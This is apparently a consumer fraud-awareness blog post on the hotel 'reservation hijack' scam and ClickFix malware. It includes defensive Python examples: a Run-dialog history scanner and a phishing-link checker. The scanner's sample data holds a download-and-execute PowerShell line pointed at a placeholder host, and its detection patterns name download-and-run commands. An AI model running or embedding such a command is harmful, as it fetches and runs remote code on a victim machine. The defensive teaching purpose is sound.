Tags: hotel scams, travel scams, reservation hijack, Booking.com, phishing, summer scams

Reservation Hijack: Your Real Hotel Booking Is the Trap

Courtney
June 11, 2026
9 min read

It's 8:47am. Nine days until your trip to the Oregon coast — flights booked, hotel confirmed, dog sitter lined up. You check your email over coffee and there's a new message from Booking.com: your name, your reservation number, the exact hotel, exact dates, exact room type. Everything checks out.

The message says there was a problem processing your credit card. Please re-verify your payment details within 24 hours or your reservation will be released.

Stop. Don't click that link.

That message — with every accurate detail about your actual, legitimate booking — may have come from a scammer who compromised your hotel's account. Security researchers at Gen Digital (the company behind Norton) published findings in May 2026 identifying this as the Reservation Hijack scam. They found more than 350 compromised hotels and accommodations across 50 countries, and estimated that these compromised properties see roughly 6 million guest stays per year — all of those guests potentially in range of a targeted message that knows exactly when and where they're traveling.

This isn't a fake listing. You booked this hotel. It's real. The scammer just got in the middle.

How the Reservation Hijack Scam Actually Works

Most hotel scams work from scratch — fake listings, fabricated reviews, invented hosts. The reservation hijack is different because it starts with real access.

Here's the chain:

Someone on the hotel staff gets hit first. A hotel employee receives an email about a "guest complaint" or an "urgent reservation issue." It links to a page with what looks like a standard CAPTCHA: "Press Win+R, paste this command, and press Enter to verify you're not a robot."

That's not a real CAPTCHA. It's a technique called ClickFix: the page has already placed a command on the clipboard, and the "verification" consists of the victim pasting it into the Windows Run dialog and executing it themselves, so the attacker never needs a browser exploit or a download prompt. The command fetches and installs malware; from there the attacker harvests the hotel's booking platform login credentials and keeps a foothold on the front office computer.

Microsoft tracks the group behind many of these attacks as Storm-1865, a financially motivated operation active since early 2023.

The attacker logs into the hotel's booking platform account. They can see every active reservation: every guest's name, email, travel dates, room type, and booking reference.

They message real guests through the real platform. Booking.com and similar platforms have a messaging system hotels use for check-in instructions and updates. The attacker uses that same system — the one you already trust — to send fake urgent payment alerts. Your real details, real channel, fake destination.

The payment page takes your card. The link goes to a fake page that mirrors the hotel's or the booking platform's design. It checks the card number as you type, the way a real checkout would, so typos are rejected and the page feels legitimate. Then your payment information goes straight to the attacker.

The scam works because there's almost nothing to trigger suspicion. The hotel is real. The message came through the right channel, so it passes every check that looks at the sender: it really was sent from the hotel's account through the platform's own servers. Your booking details are accurate because the attacker pulled them from your actual reservation. The only fake thing is where the link goes.
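One place a ClickFix infection leaves a trace is the Run dialog itself: everything typed into Win+R is recorded in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The block below is an added example, not code from this article or from Gen Digital's research, that scans that history for the download-and-execute and fake-verification patterns described above. The sample RunMRU entries are constructed for the example (the URL uses the reserved example.invalid domain), and the live-registry reader only works on Windows.

```python
"""Added example: flag ClickFix-style commands in Windows Run-dialog history.

Win+R history lives in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
one value per slot ("a", "b", ...) holding the command followed by a literal
"\\1" suffix, plus "MRUList", a string of slot names ordered most-recent-first.
Patterns and sample data are illustrative, not the article's or Gen Digital's tooling.
"""
import re
import sys

_FLAGS = re.IGNORECASE | re.DOTALL

# (compiled regex, reason) pairs. A command is flagged if any pattern matches.
SUSPICIOUS = [
    (re.compile(r"\b(powershell|pwsh)\b.*?"
                r"(-w(indowstyle)?\s+h(idden)?\b|-e(nc|ncodedcommand)?\s|\biex\b|"
                r"invoke-expression|\birm\b|invoke-restmethod|\biwr\b|"
                r"invoke-webrequest|downloadstring|frombase64string)", _FLAGS),
     "PowerShell with hidden window, encoded command, or download-and-run primitive"),
    (re.compile(r"\bmshta(\.exe)?\b.*?(https?://|javascript:|vbscript:)", _FLAGS),
     "mshta pointed at a remote or inline script"),
    (re.compile(r"\b(curl|certutil|bitsadmin)\b.*?https?://", _FLAGS),
     "command-line downloader pointed at a URL"),
    (re.compile(r"(not a robot|captcha|verification id|verify you are human)", _FLAGS),
     "fake-CAPTCHA wording embedded in the command (the ClickFix tell)"),
]


def parse_runmru(values: dict) -> list[tuple[str, str]]:
    """Return (slot, command) pairs, most recent first, with the "\\1" suffix removed."""
    order = values.get("MRUList") or "".join(sorted(k for k in values if k != "MRUList"))
    entries = []
    for slot in order:
        raw = values.get(slot)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((slot, cmd.strip()))
    return entries


def classify(command: str) -> list[str]:
    """Reasons a single Run-dialog command looks like a ClickFix payload (empty = clean)."""
    return [reason for rx, reason in SUSPICIOUS if rx.search(command)]


def flag_runmru(values: dict) -> list[dict]:
    """Scan a RunMRU export and return the entries that match at least one pattern."""
    hits = []
    for slot, cmd in parse_runmru(values):
        reasons = classify(cmd)
        if reasons:
            hits.append({"slot": slot, "command": cmd, "reasons": reasons})
    return hits


def read_runmru_live() -> dict:
    """Read the current user's RunMRU values from the registry (Windows only)."""
    if sys.platform != "win32":
        raise OSError("RunMRU is a Windows registry key")
    import winreg  # only importable on Windows
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            values[name] = data
    return values


# Constructed sample, shaped like a RunMRU export from a front-desk PC. Slot "c"
# is the kind of command a fake "verify you're not a robot" page asks staff to
# paste; the trailing comment is what makes the Run box look like a CAPTCHA.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mstsc\\1",
    "c": ('powershell -w hidden -c "iex (irm https://example.invalid/verify)" '
          '# I am not a robot - reCAPTCHA Verification ID: 7391\\1'),
}

if __name__ == "__main__":
    for hit in flag_runmru(SAMPLE_RUNMRU):
        print(f"slot {hit['slot']}: {hit['command']}")
        for reason in hit["reasons"]:
            print(f"   - {reason}")
```

On a real front-desk machine you would feed `read_runmru_live()` into `flag_runmru()`; the registry only keeps the most recent handful of slots, so the check is worth running soon after a suspected incident rather than weeks later.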


Why This Is Harder to Spot Than a Fake Listing

Most scam advice is some version of "if something feels off, it probably is." Fake listings usually do feel off — the price is suspiciously low, the host is weirdly eager to move payment outside the platform, the photos look borrowed from somewhere else.

The reservation hijack has none of those tells.

You made this booking. The message is about your trip. The details all check out because they were pulled from your actual reservation. The emotional state you're in when you read it is completely different from a cold phishing email: you're not on guard, you're thinking about Oregon.

That's not naïveté. That's the scam doing exactly what it's designed to do.

The red flags exist — they're just quieter.

The Red Flags Hiding in Plain Sight

The URL doesn't match the platform. Legitimate payment requests for existing reservations keep you on the platform's domain. The fake page will use something adjacent: booking-secure-verify.com, reservations-payment-update.net, or a misspelled version of the hotel's name. Look at the full URL before you type anything, and read the domain from the right: booking.com.secure-verify.net is secure-verify.net, not booking.com. Every time.

They're asking for card info you already gave. You entered payment details when you made the reservation. Real hotels don't need them again via an email link. Legitimate payment issues on booking platforms are resolved through the platform — not by redirecting you to a third-party page.

The urgency is artificial. "24 hours or your reservation is released." Scammers manufacture pressure to short-circuit your judgment. Real hotels don't issue 24-hour ultimatums for payment re-entry.

The message is sending you off-platform. If a Booking.com message links somewhere that isn't booking.com, slow down. That's not how the platform works.

The message thread isn't proof either way. Because the attacker is logged in as the hotel, the fake alert can appear in the platform's own messaging thread with the property, so seeing it there doesn't make it safe. What the attacker can't fake is the reservation itself: open the platform's app, go to your booking, and look at its payment status. A real payment problem shows up there, not only in a message. And if the "urgent" alert arrived by email only, with no trace of it on your reservation, treat it the same way.

The checkout page has a weird "CAPTCHA." If a payment verification page asks you to run a command or paste something into your computer, exit immediately. That's ClickFix — the same technique used to compromise the hotel staff, now being run on guests.

Nobody at the hotel knows what you're talking about. Call the hotel directly using the phone number from their official website — not any number from the suspicious message. Ask whether there's a payment issue with your reservation. There won't be.
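Reading the domain correctly is the one check that defeats most of these pages, so here is an added example (not the article's or Cautellus's code) that pulls every link out of a message and reports whether it actually lands on the platform. The allow-list holds only booking.com as an assumption for the example; the sample message and its hostnames are constructed; and the registrable-domain logic takes the last two labels, which is adequate for .com/.net names but would need the Public Suffix List for country domains such as .co.uk.

```python
"""Added example: does a link in a "payment problem" message really go to the platform?"""
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption for the example: the guest booked through booking.com only.
TRUSTED_DOMAINS = {"booking.com"}

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname, read from the right.

    Adequate for .com/.net names; country second-level domains (.co.uk)
    need the Public Suffix List instead.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def link_verdict(url: str, trusted=TRUSTED_DOMAINS) -> tuple[bool, str]:
    """Return (trusted?, reason). Anything that cannot be parsed cleanly is untrusted."""
    try:
        parts = urlsplit(url.strip())
        host = parts.hostname or ""
        username = parts.username
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, f"unexpected scheme {parts.scheme!r}"
    if not host:
        return False, "no hostname"
    if username is not None:
        # https://booking.com@evil.example/ : the text before '@' is a username,
        # and the real host is whatever follows it.
        return False, f"credentials before '@' hide the real host {host}"
    try:
        ipaddress.ip_address(host)
        return False, "raw IP address instead of a domain"
    except ValueError:
        pass
    if not host.isascii() or "xn--" in host:
        return False, "non-ASCII or punycode hostname (possible look-alike)"
    base = registrable_domain(host)
    if base in trusted:
        return True, f"lands on {base}"
    return False, f"lands on {base}, not a trusted platform domain"


def scan_message(text: str, trusted=TRUSTED_DOMAINS) -> list[dict]:
    """Every link in a message with its verdict; trailing punctuation is dropped."""
    results = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;:)")
        ok, why = link_verdict(url, trusted)
        results.append({"url": url, "trusted": ok, "reason": why})
    return results


# Constructed sample in the shape the article describes; no real hostnames or bookings.
SAMPLE_MESSAGE = """Dear guest, there was a problem processing your card for
reservation 1234567890 at Seaside Inn, Jun 20-23. Please re-verify within 24 hours:
https://booking.com.reservations-payment-update.net/verify?id=1234567890
You can also view your booking at https://secure.booking.com/myreservations."""

if __name__ == "__main__":
    for r in scan_message(SAMPLE_MESSAGE):
        print(("OK   " if r["trusted"] else "STOP ") + r["url"] + "  (" + r["reason"] + ")")
```

The order of the checks matters: the username test runs before the domain test because `https://booking.com@evil.example/` would otherwise look like it starts with the right name, and the IP and non-ASCII tests run before the allow-list so a look-alike never reaches the comparison.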

If This Already Happened to You

First: you didn't do something careless. You received a message with your correct booking information through a channel you had every reason to trust. The scam was designed to be convincing. That's on the scammers, not you.

Here's what to do now:

Call your bank immediately. Report the charge as fraud and ask them to cancel the card and issue a new number. The faster you call, the better your chances of a successful chargeback. Most major card issuers have 24/7 fraud lines.

Change your passwords. If the fake page asked you to log in anywhere, treat those credentials as compromised. Change them everywhere — especially if you reuse passwords.

Report it to the booking platform. Booking.com and similar platforms want to know when partner hotel accounts are compromised. A report helps them investigate the affected property and warn other guests.

File a report with the FTC. Go to reportfraud.ftc.gov. Five minutes. Imposter scam losses hit $3.5 billion in 2025 according to the FTC — these reports actually drive enforcement action.

Watch your statements for the next few weeks. Stolen card data is often used or resold later rather than immediately, so turn on transaction alerts from your bank; they catch a rogue charge faster than a monthly review of the statement.

How to Not Become the Next Victim

You can't control whether your hotel's IT department has good security habits. You can control what happens when a payment request lands in your inbox.

Treat all unexpected payment requests with suspicion, even when the details look right. Correct details are no longer proof of legitimacy. The whole point of this scam is that the details are correct.

Verify through the platform directly. When a payment alert arrives, open a new browser tab, type the booking platform's URL yourself, and check your reservation status there. Don't click the link in the message.

Use a credit card for travel bookings, not a debit card. A fraudulent credit card charge is the issuer's money until the dispute is settled. A fraudulent debit transaction is your money, already out of your account while the bank investigates, and recovery is significantly harder.

Enable two-factor authentication on your travel accounts. Booking platforms support it. It won't stop this particular scam, because the account that's compromised is the hotel's, not yours, but it keeps your own account, booking history, and stored payment methods from being the next thing taken over.

For a broader look at the travel scams currently circulating — fake listings, bogus airline deals, parking QR codes — this post covers the full summer landscape. If you want to know how to evaluate a suspicious email before clicking anything, here's how to tell if an email is phishing. And when a payment page looks plausible but something feels slightly off, this is how to check if a website is actually legitimate.


Frequently Asked Questions

What is the reservation hijack scam?

Attackers compromise a real hotel's account on a booking platform like Booking.com, then use that access to contact real guests with fake payment requests. Because the messages contain accurate booking details and arrive through the legitimate platform's messaging channel, they're convincing in a way most scam emails aren't. The link leads to a fake payment page designed to steal card information.

How do I know if a payment request from my hotel is actually real?

Go directly to the booking platform by typing the URL yourself — don't click the link in the message — and check whether a payment issue shows up in your reservation. Or call the hotel using the number from their official website. Legitimate platforms don't redirect you to a third-party site to re-enter payment details you already provided.

I already entered my card number. What do I do now?

Call your bank immediately and report it as fraud. Ask them to cancel the card and issue a new number. Report the incident to the booking platform, and file a fraud report at reportfraud.ftc.gov.

Is Booking.com safe to use?

Booking.com is a legitimate platform. The reservation hijack scam doesn't exploit a vulnerability in Booking.com itself — it exploits compromised hotel partner credentials. The platform isn't the weak link; individual hotels' security practices are. Verify unexpected payment requests through a separate channel before entering any information.

What is a ClickFix attack?

ClickFix is a social engineering technique where attackers present targets with a fake "verify you're not a robot" prompt that actually instructs them to run a malicious command on their computer. Hotel staff are targeted with fake "urgent guest complaint" emails that use this technique to steal booking platform credentials. The same technique has also been spotted on fake payment pages targeting guests directly.

How widespread is this scam right now?

Security researchers at Gen Digital identified more than 350 compromised hotel and accommodation properties across 50 countries as of May 2026, with the U.S., Germany, France, the UK, Italy, and Spain among the most affected. They estimate roughly 6 million guest stays per year fall within range of follow-up messages using real booking details.


Scammers got better at this. Knowing they have your real details isn't a reason to trust a message — it's a reason to slow down before you click anything.

Sources: Gen Digital, "The Reservation Hijack Scam," May 2026; Gen Digital, "350 Hotels Compromised Across 50 Countries"; Norton Summer Scam Forecast, June 5, 2026; FTC, "New trends in reports of imposter scams," May 2026


Courtney

Founder, Cautellus · 20+ years in financial services

Two decades in financial compliance, digital security, and fraud prevention. Built Cautellus because the scam detection tools that exist were made for IT departments, not for real people getting weird texts.
